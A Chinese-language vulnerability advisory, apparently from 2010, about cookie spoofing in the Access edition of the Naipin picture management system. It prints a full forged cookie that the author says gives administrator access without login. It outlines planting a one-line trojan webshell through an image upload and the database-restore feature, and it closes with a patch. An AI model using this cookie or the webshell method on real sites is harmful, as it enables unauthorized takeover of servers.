發(fā)布日期:2010-10.08 發(fā)布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發(fā)現(xiàn)了《耐品 圖片 管理 系統(tǒng) Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改Cookie拿到 管理
發(fā)布日期:2010-10.08
發(fā)布作者:redice
影響版本:20100906 Access版
官方地址:http://www.naipin.com/
漏洞類型:Cookie欺騙
漏洞描述:大概一年前我發(fā)現(xiàn)了《耐品圖片管理系統(tǒng)Access版》有Cookie欺騙漏洞:任意用戶可以通過修改Cookie拿到管理員權(quán)限。
今年6月份我給耐品技術(shù)發(fā)了郵件,告知了這個(gè)漏洞,他們回復(fù)如下:
”您好,謝謝您的提醒!
祝您合家幸福安康!“
今天我下載了最新版(Naipin_T_20100906_acc.rar)進(jìn)行了測(cè)試,發(fā)現(xiàn)這個(gè)漏洞仍然存在。
既然官方如此不重視,我就它放出來。
Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=%C6%D5%CD%A8%BB%E1%D4%B1&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL
利用上面的cookie不登錄也能拿到管理員權(quán)限...
拿Webshell的一種思路:
如果數(shù)據(jù)庫后綴名是asp的,可以采用該思路。上傳用戶圖像,上傳一張含有一句話木馬的圖片(采用edjpgcom工具)。
進(jìn)入后臺(tái),使用數(shù)據(jù)庫恢復(fù)功能將上傳的圖片恢復(fù)為數(shù)據(jù)庫。
修復(fù)方案:臨時(shí)修補(bǔ)辦法如下:
(1)Admin_ChkLogin.asp第66行下增加如下代碼:
session("GroupId")=Rs("GroupId")
(2)將clsMain.asp的第112行改為如下代碼:
UserGroupId=session("GroupID")
(3)建議盡量做到:能寫入的目錄不給執(zhí)行權(quán)限,能執(zhí)行的目錄不給寫入權(quán)限。
標(biāo)簽分類: cookie欺騙 驗(yàn)證漏洞
聲明:本網(wǎng)頁內(nèi)容旨在傳播知識(shí),若有侵權(quán)等問題請(qǐng)及時(shí)與本網(wǎng)聯(lián)系,我們將在第一時(shí)間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com